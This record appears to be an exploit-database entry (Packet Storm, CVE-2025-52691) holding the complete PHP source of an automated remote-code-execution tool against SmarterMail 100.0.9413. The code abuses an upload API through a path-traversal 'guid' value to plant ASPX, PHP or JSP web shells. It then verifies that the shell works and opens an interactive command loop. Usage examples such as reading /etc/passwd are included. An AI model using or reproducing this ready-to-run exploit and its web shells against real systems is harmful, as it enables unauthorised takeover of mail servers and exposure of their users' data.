{“lastseen”:”2026-02-20T23:00:38″,”description”:”This PHP code implements a fully automated remote exploitation framework targeting SmarterMail version 100.0.9413. It is designed to identify the service, determine the underlying operating system, abuse a file upload mechanism with path traversal, and…”,”published”:”2026-02-20T00:00:00″,”modified”:”2026-02-20T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 SmarterMail 100.0.9413 GUID File Remote Code Execution”,”source”:””,”references”:””,”id”:”PACKETSTORM:215959″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2025-52691″],”sourceData”:”=============================================================================================================================================\\n | # Title : SmarterMail v 100.0.9413 GUID File RCE Exploit\\n |\\n | # Author : indoushka\\n |\\n | # Tested on : windows 11 Fr(Pro) \/ browser : Mozilla firefox 147.0.1 (64\\n bits) |\\n | # Vendor : https:\/\/www.smartertools.com\/smartermail\/downloads\\n |\\n =============================================================================================================================================\\n \\n [+] Summary: This PHP code implements a fully automated remote exploitation\\n framework targeting a vulnerable SmarterMail installation.\\n It is designed to identify the service, determine the\\n underlying operating system, abuse a file upload mechanism with path\\n traversal, and achieve arbitrary file write leading to remote command\\n execution.\\n The tool supports multiple payload formats (ASPX, PHP, JSP,\\n and direct command logic) and dynamically adapts to Windows or Unix-like\\n environments.\\n It performs service detection, payload generation, upload delivery,\\n reachability verification, and optional interactive command execution\\n through a web-accessible endpoint.\\n From a security research perspective, the exploit demonstrates\\n a complete attack chain, starting from insufficient validation in an upload\\n API and culminating in post-exploitation command execution.\\n The vulnerability class spans multiple critical weakness categories,\\n including unrestricted file upload, path traversal, and remote code\\n execution.\\n The framework is modular, configurable via command-line\\n arguments, and capable of adapting payload behavior based on server\\n response and environment characteristics.\\n Its design reflects post-exploitation automation rather than a simple proof\\n of concept.\\n \\n \\n \\n [+] POC :\\n \\n # PHP shell with interactive mode : php exploit.php http:\/\/victim.com \\”id\\”\\n –type=php –interactive\\n \\n # ASPX shell for Windows : php exploit.php http:\/\/win-server.com\\n \\”ipconfig\\” –type=aspx\\n \\n # JSP shell with custom command : php exploit.php http:\/\/java-app.com\\n \\”uname -a\\” –type=jsp\\n \\n # Automatic system discovery : php exploit.php http:\/\/unknown-os.com\\n \\”hostname\\” –type=php\\n \\n \\u003c?php\\n \\n class SmarterMailExploit\\n {\\n private $targetUrl;\\n private $targetUri;\\n private $depth;\\n private $webRootPort;\\n private $targetDir;\\n private $payload;\\n private $payloadType;\\n private $curlTimeout = 30;\\n \\n const PAYLOAD_ASPX = ‘aspx’;\\n const PAYLOAD_PHP = ‘php’;\\n const PAYLOAD_JSP = ‘jsp’;\\n const PAYLOAD_CMD = ‘cmd’;\\n \\n public function __construct($options = [])\\n {\\n $this-\\u003etargetUrl = rtrim($options[‘target_url’] ?? ”, ‘\/’);\\n $this-\\u003etargetUri = ‘\/’ . ltrim($options[‘target_uri’] ?? ”, ‘\/’);\\n $this-\\u003edepth = max(1, intval($options[‘depth’] ?? 15));\\n $this-\\u003ewebRootPort = intval($options[‘web_root_port’] ?? 80);\\n $this-\\u003etargetDir = $options[‘target_dir’] ?? null;\\n $this-\\u003epayloadType = $options[‘payload_type’] ?? self::PAYLOAD_CMD;\\n \\n if (!isset($options[‘is_windows’])) {\\n $this-\\u003eisWindows = $this-\\u003edetectWindows();\\n } else {\\n $this-\\u003eisWindows = $options[‘is_windows’];\\n }\\n \\n if ($this-\\u003eisWindows \\u0026\\u0026 empty($this-\\u003etargetDir)) {\\n $this-\\u003etargetDir = ‘\/inetpub\/wwwroot’;\\n } elseif (!$this-\\u003eisWindows \\u0026\\u0026 empty($this-\\u003etargetDir)) {\\n $this-\\u003etargetDir = ‘\/tmp’;\\n }\\n \\n $this-\\u003etargetDir = rtrim($this-\\u003etargetDir, ‘\/’);\\n }\\n \\n private function detectWindows()\\n {\\n try {\\n $url = $this-\\u003etargetUrl . $this-\\u003etargetUri . ‘\/’;\\n \\n $ch = curl_init($url);\\n curl_setopt_array($ch, [\\n CURLOPT_RETURNTRANSFER =\\u003e true,\\n CURLOPT_HEADER =\\u003e true,\\n CURLOPT_NOBODY =\\u003e true,\\n CURLOPT_SSL_VERIFYPEER =\\u003e false,\\n CURLOPT_SSL_VERIFYHOST =\\u003e false,\\n CURLOPT_TIMEOUT =\\u003e 10,\\n CURLOPT_USERAGENT =\\u003e ‘Mozilla\/5.0’\\n ]);\\n \\n $response = curl_exec($ch);\\n \\n if ($response !== false) {\\n $headers = explode(\\”\\\\n\\”, $response);\\n foreach ($headers as $header) {\\n if (stripos($header, ‘Server:’) !== false) {\\n if (stripos($header, ‘IIS’) !== false ||\\n stripos($header, ‘Microsoft’) !== false ||\\n stripos($header, ‘Win32’) !== false) {\\n curl_close($ch);\\n return true;\\n }\\n }\\n }\\n }\\n \\n curl_close($ch);\\n return false;\\n \\n } catch (Exception $e) {\\n return false;\\n }\\n }\\n \\n public function check()\\n {\\n try {\\n $url = $this-\\u003etargetUrl . $this-\\u003etargetUri . ‘\/’;\\n \\n $ch = curl_init($url);\\n curl_setopt_array($ch, [\\n CURLOPT_RETURNTRANSFER =\\u003e true,\\n CURLOPT_SSL_VERIFYPEER =\\u003e false,\\n CURLOPT_SSL_VERIFYHOST =\\u003e false,\\n CURLOPT_TIMEOUT =\\u003e $this-\\u003ecurlTimeout,\\n CURLOPT_FOLLOWLOCATION =\\u003e true,\\n CURLOPT_MAXREDIRS =\\u003e 5,\\n CURLOPT_USERAGENT =\\u003e ‘Mozilla\/5.0’\\n ]);\\n \\n $response = curl_exec($ch);\\n \\n if ($response === false) {\\n $error = curl_error($ch);\\n curl_close($ch);\\n throw new Exception(\\”HTTP request failed: {$error}\\”);\\n }\\n \\n $httpCode = curl_getinfo($ch, CURLINFO_HTTP_CODE);\\n curl_close($ch);\\n \\n if ($httpCode == 200 || $httpCode == 302 || $httpCode == 401) {\\n if (stripos($response, ‘SmarterMail’) !== false) {\\n return true;\\n }\\n return null;\\n }\\n \\n return false;\\n \\n } catch (Exception $e) {\\n error_log(\\”Check failed: \\” . $e-\\u003egetMessage());\\n return false;\\n }\\n }\\n \\n private function generatePayload($command, $payloadType = null)\\n {\\n $type = $payloadType ?? $this-\\u003epayloadType;\\n \\n switch ($type) {\\n case self::PAYLOAD_ASPX:\\n return $this-\\u003egenerateAspxPayload($command);\\n \\n case self::PAYLOAD_PHP:\\n return $this-\\u003egeneratePhpPayload($command);\\n \\n case self::PAYLOAD_JSP:\\n return $this-\\u003egenerateJspPayload($command);\\n \\n case self::PAYLOAD_CMD:\\n default:\\n return $command;\\n }\\n }\\n \\n private function generateAspxPayload($command)\\n {\\n $encodedCommand = rawurlencode($command);\\n $processStartInfo = ‘proc’ . bin2hex(random_bytes(4));\\n $process = ‘process’ . bin2hex(random_bytes(4));\\n \\n return \\u003c\\u003c\\u003cEOF\\n \\u003c%@ Page Language=\\”C#\\” Debug=\\”true\\” Trace=\\”false\\” %\\u003e\\n \\u003c%@ Import Namespace=\\”System.Diagnostics\\” %\\u003e\\n \\u003c%@ Import Namespace=\\”System.IO\\” %\\u003e\\n \\u003c%@ Import Namespace=\\”System.Text\\” %\\u003e\\n \\u003cscript Language=\\”c#\\” runat=\\”server\\”\\u003e\\n void Page_Load(object sender, EventArgs e)\\n {\\n Response.ContentType = \\”text\/plain\\”;\\n Response.Charset = \\”UTF-8\\”;\\n \\n string cmd = Request.QueryString[\\”cmd\\”];\\n if (string.IsNullOrEmpty(cmd)) {\\n cmd = System.Uri.UnescapeDataString(\\”{$encodedCommand}\\”);\\n }\\n \\n if (!string.IsNullOrEmpty(cmd)) {\\n try {\\n ProcessStartInfo $processStartInfo = new ProcessStartInfo();\\n \\n if (System.Environment.OSVersion.Platform ==\\n PlatformID.Win32NT) {\\n $processStartInfo.FileName = \\”cmd.exe\\”;\\n $processStartInfo.Arguments = \\”\/c \\” + cmd;\\n } else {\\n $processStartInfo.FileName = \\”\/bin\/sh\\”;\\n $processStartInfo.Arguments = \\”-c \\\\\\”\\” + cmd.Replace(\\”\\\\\\”\\”,\\n \\”\\\\\\\\\\\\\\”\\”) + \\”\\\\\\”\\”;\\n }\\n \\n $processStartInfo.RedirectStandardOutput = true;\\n $processStartInfo.RedirectStandardError = true;\\n $processStartInfo.UseShellExecute = false;\\n $processStartInfo.CreateNoWindow = true;\\n $processStartInfo.StandardOutputEncoding = Encoding.UTF8;\\n $processStartInfo.StandardErrorEncoding = Encoding.UTF8;\\n \\n Process $process = Process.Start($processStartInfo);\\n string output = $process.StandardOutput.ReadToEnd();\\n string error = $process.StandardError.ReadToEnd();\\n $process.WaitForExit(30000);\\n \\n Response.Write(\\”STDOUT:\\\\\\\\n\\” + output + \\”\\\\\\\\n\\\\\\\\n\\”);\\n if (!string.IsNullOrEmpty(error)) {\\n Response.Write(\\”STDERR:\\\\\\\\n\\” + error + \\”\\\\\\\\n\\”);\\n }\\n Response.Write(\\”Exit Code: \\” + $process.ExitCode);\\n \\n } catch (Exception ex) {\\n Response.Write(\\”ERROR: \\” + ex.Message + \\”\\\\\\\\n\\” + ex.StackTrace);\\n }\\n } else {\\n Response.Write(\\”No command specified. Use ?cmd=command\\”);\\n }\\n }\\n \\u003c\/script\\u003e\\n EOF;\\n }\\n \\n private function generatePhpPayload($command)\\n {\\n $encodedCommand = base64_encode($command);\\n \\n return \\u003c\\u003c\\u003cEOF\\n \\u003c?php\\n header(‘Content-Type: text\/plain; charset=utf-8’);\\n \\n if (isset(\\\\$_REQUEST[‘cmd’])) {\\n \\\\$cmd = base64_decode(\\\\$_REQUEST[‘cmd’]);\\n } elseif (isset(\\\\$_REQUEST[‘c’])) {\\n \\\\$cmd = \\\\$_REQUEST[‘c’];\\n } else {\\n \/\/ Default command from payload\\n \\\\$cmd = base64_decode(‘{$encodedCommand}’);\\n }\\n \\n if (!empty(\\\\$cmd)) {\\n if (function_exists(‘shell_exec’)) {\\n \\\\$output = shell_exec(\\\\$cmd);\\n echo \\\\$output !== null ? \\\\$output : \\”(no output)\\”;\\n } elseif (function_exists(‘system’)) {\\n ob_start();\\n system(\\\\$cmd);\\n \\\\$output = ob_get_clean();\\n echo \\\\$output;\\n } elseif (function_exists(‘passthru’)) {\\n ob_start();\\n passthru(\\\\$cmd);\\n \\\\$output = ob_get_clean();\\n echo \\\\$output;\\n } elseif (function_exists(‘exec’)) {\\n \\\\$output = array();\\n exec(\\\\$cmd, \\\\$output, \\\\$return_var);\\n echo implode(\\”\\\\\\\\n\\”, \\\\$output);\\n echo \\”\\\\\\\\nExit code: \\” . \\\\$return_var;\\n } elseif (function_exists(‘proc_open’)) {\\n \\\\$descriptorspec = array(\\n 0 =\\u003e array(\\”pipe\\”, \\”r\\”),\\n 1 =\\u003e array(\\”pipe\\”, \\”w\\”),\\n 2 =\\u003e array(\\”pipe\\”, \\”w\\”)\\n );\\n \\n \\\\$process = proc_open(\\\\$cmd, \\\\$descriptorspec, \\\\$pipes);\\n \\n if (is_resource(\\\\$process)) {\\n fclose(\\\\$pipes[0]);\\n \\n \\\\$stdout = stream_get_contents(\\\\$pipes[1]);\\n fclose(\\\\$pipes[1]);\\n \\n \\\\$stderr = stream_get_contents(\\\\$pipes[2]);\\n fclose(\\\\$pipes[2]);\\n \\n \\\\$return_value = proc_close(\\\\$process);\\n \\n echo \\”STDOUT:\\\\\\\\n\\” . \\\\$stdout . \\”\\\\\\\\n\\\\\\\\n\\”;\\n if (!empty(\\\\$stderr)) {\\n echo \\”STDERR:\\\\\\\\n\\” . \\\\$stderr . \\”\\\\\\\\n\\\\\\\\n\\”;\\n }\\n echo \\”Exit code: \\” . \\\\$return_value;\\n }\\n } else {\\n echo \\”No shell execution functions available\\”;\\n }\\n } else {\\n echo \\”PHP Shell Ready. Use cmd or c parameter.\\”;\\n }\\n ?\\u003e\\n EOF;\\n }\\n \\n private function generateJspPayload($command)\\n {\\n $encodedCommand = base64_encode($command);\\n \\n return \\u003c\\u003c\\u003cEOF\\n \\u003c%@ page import=\\”java.util.*,java.io.*,java.lang.*\\” %\\u003e\\n \\u003c%\\n response.setContentType(\\”text\/plain\\”);\\n response.setCharacterEncoding(\\”UTF-8\\”);\\n \\n String cmd = request.getParameter(\\”cmd\\”);\\n if (cmd == null || cmd.isEmpty()) {\\n \/\/ Use default command from payload\\n cmd = new\\n String(java.util.Base64.getDecoder().decode(\\”{$encodedCommand}\\”));\\n }\\n \\n if (cmd != null \\u0026\\u0026 !cmd.isEmpty()) {\\n try {\\n Process p;\\n if (System.getProperty(\\”os.name\\”).toLowerCase().contains(\\”win\\”)) {\\n p = Runtime.getRuntime().exec(new String[]{\\”cmd.exe\\”, \\”\/c\\”,\\n cmd});\\n } else {\\n p = Runtime.getRuntime().exec(new String[]{\\”\/bin\/sh\\”, \\”-c\\”,\\n cmd});\\n }\\n \\n BufferedReader stdInput = new BufferedReader(new\\n InputStreamReader(p.getInputStream()));\\n BufferedReader stdError = new BufferedReader(new\\n InputStreamReader(p.getErrorStream()));\\n \\n String s;\\n out.println(\\”STDOUT:\\”);\\n while ((s = stdInput.readLine()) != null) {\\n out.println(s);\\n }\\n \\n out.println(\\”\\\\nSTDERR:\\”);\\n while ((s = stdError.readLine()) != null) {\\n out.println(s);\\n }\\n \\n p.waitFor();\\n out.println(\\”\\\\nExit value: \\” + p.exitValue());\\n \\n stdInput.close();\\n stdError.close();\\n } catch (Exception e) {\\n out.println(\\”ERROR: \\” + e.toString());\\n e.printStackTrace(new PrintWriter(out));\\n }\\n } else {\\n out.println(\\”JSP Shell Ready. Use cmd parameter.\\”);\\n }\\n %\\u003e\\n EOF;\\n }\\n \\n private function getFileExtension($payloadType = null)\\n {\\n $type = $payloadType ?? $this-\\u003epayloadType;\\n \\n switch ($type) {\\n case self::PAYLOAD_ASPX:\\n return ‘.aspx’;\\n case self::PAYLOAD_PHP:\\n return ‘.php’;\\n case self::PAYLOAD_JSP:\\n return ‘.jsp’;\\n case self::PAYLOAD_CMD:\\n default:\\n return $this-\\u003eisWindows ? ‘.aspx’ : ‘.sh’;\\n }\\n }\\n \\n private function uploadPayload($targetDir, $filename, $payloadContents,\\n $payloadType = null)\\n {\\n $boundary = ‘—-WebKitFormBoundary’ . bin2hex(random_bytes(16));\\n $extension = $this-\\u003egetFileExtension($payloadType);\\n $resumableFilename = bin2hex(random_bytes(4)) . $extension;\\n \\n $postData = ”;\\n \\n $postData .= \\”–{$boundary}\\\\r\\\\n\\”;\\n $postData .= \\”Content-Disposition: form-data;\\n name=\\\\\\”context\\\\\\”\\\\r\\\\n\\\\r\\\\n\\”;\\n $postData .= \\”attachment\\\\r\\\\n\\”;\\n \\n $postData .= \\”–{$boundary}\\\\r\\\\n\\”;\\n $postData .= \\”Content-Disposition: form-data;\\n name=\\\\\\”resumableIdentifier\\\\\\”\\\\r\\\\n\\\\r\\\\n\\”;\\n $postData .= \\”{$filename}\\\\r\\\\n\\”;\\n \\n $postData .= \\”–{$boundary}\\\\r\\\\n\\”;\\n $postData .= \\”Content-Disposition: form-data;\\n name=\\\\\\”resumableFilename\\\\\\”\\\\r\\\\n\\\\r\\\\n\\”;\\n $postData .= \\”{$resumableFilename}\\\\r\\\\n\\”;\\n \\n $traversal = str_repeat(‘..\/’, $this-\\u003edepth);\\n $postData .= \\”–{$boundary}\\\\r\\\\n\\”;\\n $postData .= \\”Content-Disposition: form-data;\\n name=\\\\\\”contextData\\\\\\”\\\\r\\\\n\\”;\\n $postData .= \\”Content-Type: application\/json\\\\r\\\\n\\\\r\\\\n\\”;\\n $postData .=\\n \\”{\\\\\\”guid\\\\\\”:\\\\\\”dag\/{$traversal}{$targetDir}\/{$filename}\\\\\\”}\\\\r\\\\n\\”;\\n \\n $randomName = bin2hex(random_bytes(8));\\n $postData .= \\”–{$boundary}\\\\r\\\\n\\”;\\n $postData .= \\”Content-Disposition: form-data;\\n name=\\\\\\”{$randomName}\\\\\\”; filename=\\\\\\”{$randomName}.txt\\\\\\”\\\\r\\\\n\\”;\\n $postData .= \\”Content-Type: application\/octet-stream\\\\r\\\\n\\\\r\\\\n\\”;\\n $postData .= $payloadContents . \\”\\\\r\\\\n\\”;\\n \\n $postData .= \\”–{$boundary}–\\\\r\\\\n\\”;\\n \\n $url = $this-\\u003etargetUrl . $this-\\u003etargetUri . ‘\/api\/upload’;\\n \\n $ch = curl_init($url);\\n curl_setopt_array($ch, [\\n CURLOPT_POST =\\u003e true,\\n CURLOPT_POSTFIELDS =\\u003e $postData,\\n CURLOPT_HTTPHEADER =\\u003e [\\n \\”Content-Type: multipart\/form-data; boundary={$boundary}\\”,\\n \\”User-Agent: Mozilla\/5.0\\”,\\n \\”Accept: application\/json, *\/*\\”\\n ],\\n CURLOPT_RETURNTRANSFER =\\u003e true,\\n CURLOPT_SSL_VERIFYPEER =\\u003e false,\\n CURLOPT_SSL_VERIFYHOST =\\u003e false,\\n CURLOPT_TIMEOUT =\\u003e $this-\\u003ecurlTimeout,\\n CURLOPT_FOLLOWLOCATION =\\u003e true,\\n CURLOPT_MAXREDIRS =\\u003e 5\\n ]);\\n \\n $response = curl_exec($ch);\\n \\n if ($response === false) {\\n $error = curl_error($ch);\\n curl_close($ch);\\n throw new Exception(\\”cURL request failed: {$error}\\”);\\n }\\n \\n $httpCode = curl_getinfo($ch, CURLINFO_HTTP_CODE);\\n curl_close($ch);\\n \\n if ($httpCode != 200) {\\n throw new Exception(\\”File upload failed. HTTP Code:\\n {$httpCode}\\”);\\n }\\n \\n $json = json_decode($response, true);\\n if ($json === null) {\\n throw new Exception(\\”Invalid JSON response from server\\”);\\n }\\n \\n if (!isset($json[‘key’])) {\\n throw new Exception(\\”Server response missing ‘key’ field\\”);\\n }\\n \\n $key = $json[‘key’];\\n if (!preg_match(‘\/([^\\\\\/]+)$\/’, $key, $matches)) {\\n throw new Exception(\\”Could not extract filename from key:\\n {$key}\\”);\\n }\\n \\n $uploadedFilename = $matches[1];\\n echo \\”[+] Uploaded payload file: {$uploadedFilename}\\\\n\\”;\\n return $uploadedFilename;\\n }\\n \\n private function testPayload($filename, $payloadType, $testCommand =\\n ‘whoami’)\\n {\\n $port = ($this-\\u003ewebRootPort != 80 \\u0026\\u0026 $this-\\u003ewebRootPort != 443) ?\\n \\”:{$this-\\u003ewebRootPort}\\” : ”;\\n $url = $this-\\u003etargetUrl . $port . $this-\\u003etargetUri . ‘\/’ .\\n $filename;\\n \\n echo \\”[*] Testing payload at: {$url}\\\\n\\”;\\n \\n $testUrl = $url;\\n \\n switch ($payloadType) {\\n case self::PAYLOAD_ASPX:\\n $testUrl .= ‘?cmd=’ . urlencode($testCommand);\\n break;\\n \\n case self::PAYLOAD_PHP:\\n $testUrl .= ‘?cmd=’ . base64_encode($testCommand);\\n break;\\n \\n case self::PAYLOAD_JSP:\\n $testUrl .= ‘?cmd=’ . urlencode($testCommand);\\n break;\\n }\\n \\n $ch = curl_init($testUrl);\\n curl_setopt_array($ch, [\\n CURLOPT_RETURNTRANSFER =\\u003e true,\\n CURLOPT_SSL_VERIFYPEER =\\u003e false,\\n CURLOPT_SSL_VERIFYHOST =\\u003e false,\\n CURLOPT_TIMEOUT =\\u003e $this-\\u003ecurlTimeout,\\n CURLOPT_USERAGENT =\\u003e ‘Mozilla\/5.0’\\n ]);\\n \\n $response = curl_exec($ch);\\n $httpCode = curl_getinfo($ch, CURLINFO_HTTP_CODE);\\n curl_close($ch);\\n \\n if ($response !== false) {\\n echo \\”[+] Payload test successful. HTTP Code: {$httpCode}\\\\n\\”;\\n \\n $preview = substr($response, 0, 1000);\\n if (strlen($response) \\u003e 1000) {\\n $preview .= \\”…\\\\n[+] Output truncated, \\” .\\n (strlen($response) – 1000) . \\” more characters\\”;\\n }\\n \\n echo \\”[+] Response preview:\\\\n\\” . $preview . \\”\\\\n\\”;\\n \\n return $response;\\n }\\n \\n return false;\\n }\\n \\n public function executeCommand($filename, $payloadType, $command)\\n {\\n $port = ($this-\\u003ewebRootPort != 80 \\u0026\\u0026 $this-\\u003ewebRootPort != 443) ?\\n \\”:{$this-\\u003ewebRootPort}\\” : ”;\\n $url = $this-\\u003etargetUrl . $port . $this-\\u003etargetUri . ‘\/’ .\\n $filename;\\n \\n switch ($payloadType) {\\n case self::PAYLOAD_ASPX:\\n $url .= ‘?cmd=’ . urlencode($command);\\n break;\\n \\n case self::PAYLOAD_PHP:\\n $url .= ‘?cmd=’ . base64_encode($command);\\n break;\\n \\n case self::PAYLOAD_JSP:\\n $url .= ‘?cmd=’ . urlencode($command);\\n break;\\n \\n case self::PAYLOAD_CMD:\\n return $this-\\u003eexecuteDirect($command);\\n }\\n \\n $ch = curl_init($url);\\n curl_setopt_array($ch, [\\n CURLOPT_RETURNTRANSFER =\\u003e true,\\n CURLOPT_SSL_VERIFYPEER =\\u003e false,\\n CURLOPT_SSL_VERIFYHOST =\\u003e false,\\n CURLOPT_TIMEOUT =\\u003e $this-\\u003ecurlTimeout,\\n CURLOPT_USERAGENT =\\u003e ‘Mozilla\/5.0’\\n ]);\\n \\n $response = curl_exec($ch);\\n $httpCode = curl_getinfo($ch, CURLINFO_HTTP_CODE);\\n curl_close($ch);\\n \\n if ($response !== false \\u0026\\u0026 $httpCode == 200) {\\n return $response;\\n }\\n \\n return \\”Command execution failed. HTTP Code: {$httpCode}\\”;\\n }\\n \\n private function executeDirect($command)\\n {\\n \\n return \\”Direct command execution scheduled: {$command}\\”;\\n }\\n \\n public function exploit($command, $payloadType = null)\\n {\\n $type = $payloadType ?? $this-\\u003epayloadType;\\n $payloadName = ‘shell_’ . bin2hex(random_bytes(8));\\n \\n echo \\”[*] Using payload type: \\” . strtoupper($type) . \\”\\\\n\\”;\\n echo \\”[*] Target OS: \\” . ($this-\\u003eisWindows ? ‘Windows’ :\\n ‘Unix\/Linux’) . \\”\\\\n\\”;\\n \\n $payloadContent = $this-\\u003egeneratePayload($command, $type);\\n \\n echo \\”[*] Uploading payload to {$this-\\u003etargetDir}…\\\\n\\”;\\n $uploadedFilename = $this-\\u003euploadPayload($this-\\u003etargetDir,\\n $payloadName, $payloadContent, $type);\\n \\n echo \\”[*] Testing payload functionality…\\\\n\\”;\\n $testResult = $this-\\u003etestPayload($uploadedFilename, $type);\\n \\n if ($testResult !== false) {\\n echo \\”[+] Payload is active and responding!\\\\n\\”;\\n echo \\”[+] Shell URL: \\” . $this-\\u003etargetUrl;\\n if ($this-\\u003ewebRootPort != 80 \\u0026\\u0026 $this-\\u003ewebRootPort != 443) {\\n echo \\”:{$this-\\u003ewebRootPort}\\”;\\n }\\n echo $this-\\u003etargetUri . ‘\/’ . $uploadedFilename . \\”\\\\n\\”;\\n \\n echo \\”\\\\n[+] Usage:\\\\n\\”;\\n switch ($type) {\\n case self::PAYLOAD_ASPX:\\n echo \\” URL?cmd=whoami\\\\n\\”;\\n echo \\” URL?cmd=powershell+-c+\\\\\\”Get-Process\\\\\\”\\\\n\\”;\\n break;\\n case self::PAYLOAD_PHP:\\n echo \\” URL?cmd=\\” . base64_encode(‘whoami’) . \\”\\\\n\\”;\\n echo \\” URL?c=ls+-la\\\\n\\”;\\n break;\\n case self::PAYLOAD_JSP:\\n echo \\” URL?cmd=whoami\\\\n\\”;\\n echo \\” URL?cmd=ls+-la\\\\n\\”;\\n break;\\n }\\n \\n return [\\n ‘filename’ =\\u003e $uploadedFilename,\\n ‘type’ =\\u003e $type,\\n ‘url’ =\\u003e $this-\\u003etargetUrl . $this-\\u003etargetUri . ‘\/’ .\\n $uploadedFilename\\n ];\\n } else {\\n echo \\”[-] Payload uploaded but not responding as expected\\\\n\\”;\\n return false;\\n }\\n }\\n \\n public function interactiveShell($uploadedFilename, $payloadType)\\n {\\n echo \\”\\\\n[+] Entering interactive mode. Type ‘exit’ to quit.\\\\n\\”;\\n \\n while (true) {\\n echo \\”shell\\u003e \\”;\\n $command = trim(fgets(STDIN));\\n \\n if (empty($command)) {\\n continue;\\n }\\n \\n if (strtolower($command) == ‘exit’ || strtolower($command) ==\\n ‘quit’) {\\n break;\\n }\\n \\n $result = $this-\\u003eexecuteCommand($uploadedFilename,\\n $payloadType, $command);\\n echo $result . \\”\\\\n\\”;\\n }\\n \\n echo \\”[+] Interactive session ended.\\\\n\\”;\\n }\\n }\\n \\n if ($argv[0] == basename(__FILE__)) {\\n if ($argc \\u003c 3) {\\n echo \\”SmarterMail RCE Exploit by indoushka- CVE-2025-52691\\\\n\\”;\\n echo \\”=====================================================\\\\n\\”;\\n echo \\”Usage: php \\” . basename(__FILE__) . \\” \\u003ctarget_url\\u003e \\u003ccommand\\u003e\\n [options]\\\\n\\\\n\\”;\\n echo \\”Payload Types:\\\\n\\”;\\n echo \\” –type=aspx ASP.NET web shell (Windows)\\\\n\\”;\\n echo \\” –type=php PHP web shell (Unix\/Windows with PHP)\\\\n\\”;\\n echo \\” –type=jsp JSP web shell (Java\/Tomcat)\\\\n\\”;\\n echo \\” –type=cmd Direct command execution (default)\\\\n\\\\n\\”;\\n echo \\”Examples:\\\\n\\”;\\n echo \\” php exploit.php http:\/\/target.com \\\\\\”whoami\\\\\\” –type=php\\\\n\\”;\\n echo \\” php exploit.php http:\/\/target.com \\\\\\”powershell -c\\n ipconfig\\\\\\” –type=aspx\\\\n\\”;\\n echo \\” php exploit.php http:\/\/target.com \\\\\\”cat \/etc\/passwd\\\\\\”\\n –type=jsp\\\\n\\”;\\n exit(1);\\n }\\n \\n $targetUrl = $argv[1];\\n $command = $argv[2];\\n \\n $options = [\\n ‘target_url’ =\\u003e $targetUrl,\\n ‘target_uri’ =\\u003e ‘\/smartermail’,\\n ‘depth’ =\\u003e 15,\\n ‘web_root_port’ =\\u003e 80,\\n ‘payload_type’ =\\u003e SmarterMailExploit::PAYLOAD_CMD,\\n ‘target_dir’ =\\u003e null\\n ];\\n \\n for ($i = 3; $i \\u003c $argc; $i++) {\\n if (strpos($argv[$i], ‘–‘) === 0) {\\n $parts = explode(‘=’, $argv[$i], 2);\\n $key = substr($parts[0], 2);\\n \\n if (isset($parts[1])) {\\n if ($key == ‘depth’ || $key == ‘port’) {\\n $options[$key] = intval($parts[1]);\\n } elseif ($key == ‘type’) {\\n $validTypes = [\\n ‘aspx’ =\\u003e SmarterMailExploit::PAYLOAD_ASPX,\\n ‘php’ =\\u003e SmarterMailExploit::PAYLOAD_PHP,\\n ‘jsp’ =\\u003e SmarterMailExploit::PAYLOAD_JSP,\\n ‘cmd’ =\\u003e SmarterMailExploit::PAYLOAD_CMD\\n ];\\n \\n if (isset($validTypes[$parts[1]])) {\\n $options[‘payload_type’] = $validTypes[$parts[1]];\\n } else {\\n echo \\”[-] Invalid payload type. Valid: aspx, php,\\n jsp, cmd\\\\n\\”;\\n exit(1);\\n }\\n } else {\\n $options[$key] = $parts[1];\\n }\\n } elseif ($key == ‘windows’) {\\n $options[‘is_windows’] = true;\\n } elseif ($key == ‘linux’) {\\n $options[‘is_windows’] = false;\\n } elseif ($key == ‘interactive’) {\\n $options[‘interactive’] = true;\\n }\\n }\\n }\\n \\n $exploit = new SmarterMailExploit($options);\\n \\n try {\\n echo \\”[*] Checking target…\\\\n\\”;\\n $checkResult = $exploit-\\u003echeck();\\n \\n if ($checkResult === true) {\\n echo \\”[+] Target appears to be SmarterMail\\\\n\\”;\\n } elseif ($checkResult === null) {\\n echo \\”[?] Service accessible but SmarterMail not confirmed\\\\n\\”;\\n echo \\”[*] Continuing…\\\\n\\”;\\n } else {\\n echo \\”[-] Target not accessible\\\\n\\”;\\n exit(1);\\n }\\n \\n echo \\”[*] Executing exploit…\\\\n\\”;\\n $result = $exploit-\\u003eexploit($command);\\n \\n if ($result !== false) {\\n echo \\”\\\\n[+] Exploit successful!\\\\n\\”;\\n \\n if (isset($options[‘interactive’]) \\u0026\\u0026 $options[‘interactive’]) {\\n $exploit-\\u003einteractiveShell($result[‘filename’],\\n $result[‘type’]);\\n }\\n } else {\\n echo \\”[-] Exploit failed\\\\n\\”;\\n exit(1);\\n }\\n \\n } catch (Exception $e) {\\n echo \\”[-] Error: \\” . $e-\\u003egetMessage() . \\”\\\\n\\”;\\n exit(1);\\n }\\n }\\n \\n Greetings to\\n :=====================================================================================\\n jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln\\n (John Page aka hyp3rlinx)|\\n ===================================================================================================”,”sourceHref”:”https:\/\/packetstorm.news\/download\/215959″,”cvss”:{“score”:10,”severity”:”CRITICAL”,”vector”:”CVSS:3.1\/AV:N\/AC:L\/PR:N\/UI:N\/S:C\/C:H\/I:H\/A:H”,”version”:”3.1″},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/packetstorm.news\/files\/id\/215959\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"
